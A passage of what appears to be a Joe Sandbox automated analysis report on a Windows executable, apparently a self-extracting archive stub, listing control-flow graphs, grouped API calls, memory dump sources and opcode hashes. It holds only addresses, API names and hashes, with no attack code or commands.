                                                                                                                                            control_flow_graph 1272 7ff6ef6bc990-7ff6ef6bc9cc call 7ff6ef6d6bd0 1275 7ff6ef6bc9ce-7ff6ef6bc9d2 1272->1275 1276 7ff6ef6bc9d9 1272->1276 1275->1276 1277 7ff6ef6bc9d4-7ff6ef6bc9d7 1275->1277 1278 7ff6ef6bc9dc-7ff6ef6bca50 CreateFileW 1276->1278 1277->1278 1279 7ff6ef6bcab0-7ff6ef6bcab4 1278->1279 1280 7ff6ef6bca52-7ff6ef6bca6f GetLastError call 7ff6ef6bf630 1278->1280 1281 7ff6ef6bcab9-7ff6ef6bcabd 1279->1281 1286 7ff6ef6bcac1 1280->1286 1287 7ff6ef6bca71-7ff6ef6bcaae CreateFileW GetLastError 1280->1287 1283 7ff6ef6bcabf 1281->1283 1284 7ff6ef6bcad4-7ff6ef6bcad8 1281->1284 1288 7ff6ef6bcac6-7ff6ef6bcac8 1283->1288 1289 7ff6ef6bcafe-7ff6ef6bcb12 1284->1289 1290 7ff6ef6bcada-7ff6ef6bcade 1284->1290 1286->1288 1287->1281 1288->1284 1291 7ff6ef6bcaca 1288->1291 1293 7ff6ef6bcb2e-7ff6ef6bcb57 call 7ff6ef6d6760 1289->1293 1294 7ff6ef6bcb14-7ff6ef6bcb2a call 7ff6ef6c4ce8 1289->1294 1290->1289 1292 7ff6ef6bcae0-7ff6ef6bcaf8 SetFileTime 1290->1292 1291->1284 1292->1289 1294->1293
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CreateErrorLast$Time
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1999340476-0
                                                                                                                                            • Opcode ID: 4bc8a05c1fc9085f767ae555234f7091697c172257b6d963882fc4571e3fc474
                                                                                                                                            • Instruction ID: 48cfee534118c2b3be91f2ad73d1d821a40f1bbf42748adb64f791bfe9ff1b02
                                                                                                                                            • Opcode Fuzzy Hash: 4bc8a05c1fc9085f767ae555234f7091697c172257b6d963882fc4571e3fc474
                                                                                                                                            • Instruction Fuzzy Hash: 88415633A0828147FB248F24E4153BA2754E784BB8F140735EE6E87AC8CF7ED5449B05

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1299 7ff6ef6e38c4-7ff6ef6e391a 1300 7ff6ef6e3a45 1299->1300 1301 7ff6ef6e3920-7ff6ef6e3923 1299->1301 1304 7ff6ef6e3a47-7ff6ef6e3a63 1300->1304 1302 7ff6ef6e3925-7ff6ef6e3928 1301->1302 1303 7ff6ef6e392d-7ff6ef6e3930 1301->1303 1302->1304 1305 7ff6ef6e3936-7ff6ef6e3944 1303->1305 1306 7ff6ef6e39d9 1303->1306 1308 7ff6ef6e394d-7ff6ef6e396c LoadLibraryExW 1305->1308 1309 7ff6ef6e3946-7ff6ef6e3949 1305->1309 1307 7ff6ef6e39db-7ff6ef6e39de 1306->1307 1310 7ff6ef6e39e0-7ff6ef6e39ef GetProcAddress 1307->1310 1311 7ff6ef6e3a2a-7ff6ef6e3a3d 1307->1311 1314 7ff6ef6e398e-7ff6ef6e3998 1308->1314 1315 7ff6ef6e396e-7ff6ef6e3977 GetLastError 1308->1315 1312 7ff6ef6e39c5-7ff6ef6e39cc 1309->1312 1313 7ff6ef6e394b 1309->1313 1319 7ff6ef6e3a23 1310->1319 1320 7ff6ef6e39f1-7ff6ef6e3a18 1310->1320 1311->1300 1312->1305 1318 7ff6ef6e39d2 1312->1318 1321 7ff6ef6e39c0-7ff6ef6e39c3 1313->1321 1316 7ff6ef6e399a-7ff6ef6e39a5 1314->1316 1317 7ff6ef6e39a7-7ff6ef6e39b5 1314->1317 1322 7ff6ef6e398c 1315->1322 1323 7ff6ef6e3979-7ff6ef6e398a LoadLibraryExW 1315->1323 1316->1312 1317->1321 1324 7ff6ef6e39b7-7ff6ef6e39ba FreeLibrary 1317->1324 1318->1306 1319->1311 1320->1304 1321->1312 1325 7ff6ef6e3a1a-7ff6ef6e3a21 1321->1325 1322->1314 1323->1314 1324->1321 1325->1307
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 190572456-0
                                                                                                                                            • Opcode ID: b947aa5d3a64ffecfaea7f73750458e3202313a70507ae23ea93805b26baa352
                                                                                                                                            • Instruction ID: ec7b8d0368f2cd627d761eaf5fca151d1becb6752e56b37015a7623baecd0b0f
                                                                                                                                            • Opcode Fuzzy Hash: b947aa5d3a64ffecfaea7f73750458e3202313a70507ae23ea93805b26baa352
                                                                                                                                            • Instruction Fuzzy Hash: 05414223B0AA0283FB108F42AC027756799BF44BA0F094534DD1DCB395EF3EE540A30A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3621893840-0
                                                                                                                                            • Opcode ID: ef41243d3d78035141505aa551c49f7752d389ace621211df6dc683de2f32d7f
                                                                                                                                            • Instruction ID: c506be9ed6b33e646559a9bf1b8437d8caa052701157875e33626d1db6e29ab8
                                                                                                                                            • Opcode Fuzzy Hash: ef41243d3d78035141505aa551c49f7752d389ace621211df6dc683de2f32d7f
                                                                                                                                            • Instruction Fuzzy Hash: FAF0AF27B2844683FB509B20F894B3A2310FFE4B01F540031DA4E82850CE3EE458CB0A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1266772231-0
                                                                                                                                            • Opcode ID: 202ca0dbb777a082bc5ea6dd3ee882e1ba86617a9869b5a7865a3a02ab6cd1fb
                                                                                                                                            • Instruction ID: a9a917ed884a4b8b10f4aabb588bb9c90f78f601e26d076027c04ceff6f90ab6
                                                                                                                                            • Opcode Fuzzy Hash: 202ca0dbb777a082bc5ea6dd3ee882e1ba86617a9869b5a7865a3a02ab6cd1fb
                                                                                                                                            • Instruction Fuzzy Hash: D3F0EC6AA3855283FF909B24F895B362360BFD0B05F801031EA4E82854DF3FE119DB0A
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EnvironmentVariable
                                                                                                                                            • String ID: sfxcmd$sfxpar
                                                                                                                                            • API String ID: 1431749950-3493335439
                                                                                                                                            • Opcode ID: 9355028234e3c1df3de2f0f2c45ed962507e0bb30c5847decd366f5ed0387a86
                                                                                                                                            • Instruction ID: 2c446f353a0fc37ffe618cd8c0e41929430b806796c183eaaacf2a27c6ff136a
                                                                                                                                            • Opcode Fuzzy Hash: 9355028234e3c1df3de2f0f2c45ed962507e0bb30c5847decd366f5ed0387a86
                                                                                                                                            • Instruction Fuzzy Hash: 2E018653F0975283FE50AB11E8153B92398BF59B81F544035D88DCA392EE2FE544EB0A
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                            • String ID: EDIT
                                                                                                                                            • API String ID: 4243998846-3080729518
                                                                                                                                            • Opcode ID: e21d80ba2fcda0afe61ee5e138a94cc6b7d8cc84eeae1a0dd95cd5f916355b23
                                                                                                                                            • Instruction ID: b6ee7ed1402684b8644d17dda66c70e2165b4aeade4efeab462b051e7f5c10ed
                                                                                                                                            • Opcode Fuzzy Hash: e21d80ba2fcda0afe61ee5e138a94cc6b7d8cc84eeae1a0dd95cd5f916355b23
                                                                                                                                            • Instruction Fuzzy Hash: FE016D53B18A4683FE60AB51BC243B653A8AF98780F441032C94DC7655DE3FE1449B0A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1452418845-0
                                                                                                                                            • Opcode ID: a3f69c83429b0ae4a0281d99947e56bbaeef1c09745b8a4fe67f7e7d88935c27
                                                                                                                                            • Instruction ID: f34721d218e701e208dd24b9fa3599e63ff41dc9b133846d25083a8e2170dc7e
                                                                                                                                            • Opcode Fuzzy Hash: a3f69c83429b0ae4a0281d99947e56bbaeef1c09745b8a4fe67f7e7d88935c27
                                                                                                                                            • Instruction Fuzzy Hash: 18311B63E0C24787FA14BB2498113B913999F85384FA44535E94DCB2D3DE2FB545AB0B
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$FileHandleRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2244327787-0
                                                                                                                                            • Opcode ID: a323257c6cd013e66bdbc91a7b513783e4ef1c7ac85a55a09a4dd0f8fb45d599
                                                                                                                                            • Instruction ID: 7e5f1aa01cc8a1fd9449feb6bdbf0d32b804f6764855f5a92a083bbfa082701c
                                                                                                                                            • Opcode Fuzzy Hash: a323257c6cd013e66bdbc91a7b513783e4ef1c7ac85a55a09a4dd0f8fb45d599
                                                                                                                                            • Instruction Fuzzy Hash: E221A423E0C54287EA605B21A4003396B58BF45B98F144931FA5DC67CDDF6FEA40B74A
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LoadString
                                                                                                                                            • String ID: Extracting %s
                                                                                                                                            • API String ID: 2948472770-2318847974
                                                                                                                                            • Opcode ID: 2236e34311bc97c09f5d79616d4e94da909976376acd17a317b49b188287e802
                                                                                                                                            • Instruction ID: 2aa698e973efca87af414c4a998c31819cbfa063d3fbba2ddf86089af9a7704a
                                                                                                                                            • Opcode Fuzzy Hash: 2236e34311bc97c09f5d79616d4e94da909976376acd17a317b49b188287e802
                                                                                                                                            • Instruction Fuzzy Hash: 3E115B7AB0860187EA508F06BC40269B7A5BF89FD0F544039CE8CD3365EF7EE5518349
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Thread$CreatePriority
                                                                                                                                            • String ID: CreateThread failed
                                                                                                                                            • API String ID: 2610526550-3849766595
                                                                                                                                            • Opcode ID: dd105b4aed30a7a80ca3141c297ce4f78b67ecdfe065c40b3858bd4ccbe00e44
                                                                                                                                            • Instruction ID: 73f090bcbb2937f23018453a07e486f97b614dece2504151aafd885c56cdf2da
                                                                                                                                            • Opcode Fuzzy Hash: dd105b4aed30a7a80ca3141c297ce4f78b67ecdfe065c40b3858bd4ccbe00e44
                                                                                                                                            • Instruction Fuzzy Hash: 07115E33909A4293EB149B11F8402797365FF80798F544431E68D87269EF3EE556D709
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DirectoryInitializeMallocSystem
                                                                                                                                            • String ID: riched20.dll
                                                                                                                                            • API String ID: 174490985-3360196438
                                                                                                                                            • Opcode ID: 5b567382f467e4cd33e301c36b14eb1db3794b6038e05db0f5c483eedac7de30
                                                                                                                                            • Instruction ID: 229264b75108c040adab4f8cb16afd3c1f21a3d123ef249d30cae4deac979726
                                                                                                                                            • Opcode Fuzzy Hash: 5b567382f467e4cd33e301c36b14eb1db3794b6038e05db0f5c483eedac7de30
                                                                                                                                            • Instruction Fuzzy Hash: 80F0AF7251CA8183EB00DF20F8042AEB3A0FB98304F400136E58E83A98EF7EE158CB05
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$AllocHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3475569825-0
                                                                                                                                            • Opcode ID: aa68cc1c79c702716038aa117c22782f6525d494205ed7a6e78d6060a6e5c0ca
                                                                                                                                            • Instruction ID: 76c6b1377fcd4a9141cdd07a1220be32cd15f524cb8873ef4c9cf7be2aa2894a
                                                                                                                                            • Opcode Fuzzy Hash: aa68cc1c79c702716038aa117c22782f6525d494205ed7a6e78d6060a6e5c0ca
                                                                                                                                            • Instruction Fuzzy Hash: ADA1A173B1878187EF248F21D8413796BA9FB44BA8F044235DA5D86BD4EF3ED6049709
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::bad_alloc::bad_alloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1875163511-0
                                                                                                                                            • Opcode ID: 0b47e82709621adf6230fe8a0c560c713c59235585da1626e62420d459340151
                                                                                                                                            • Instruction ID: 3394899577ca23ddea8dfb15e565380cac3652f50e528dec1a1b9272ed4ebdb5
                                                                                                                                            • Opcode Fuzzy Hash: 0b47e82709621adf6230fe8a0c560c713c59235585da1626e62420d459340151
                                                                                                                                            • Instruction Fuzzy Hash: 9781F423A08A8287EF64DF21D5043B97768FB44B84F598031DB8D8B799DF3EE6419309
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
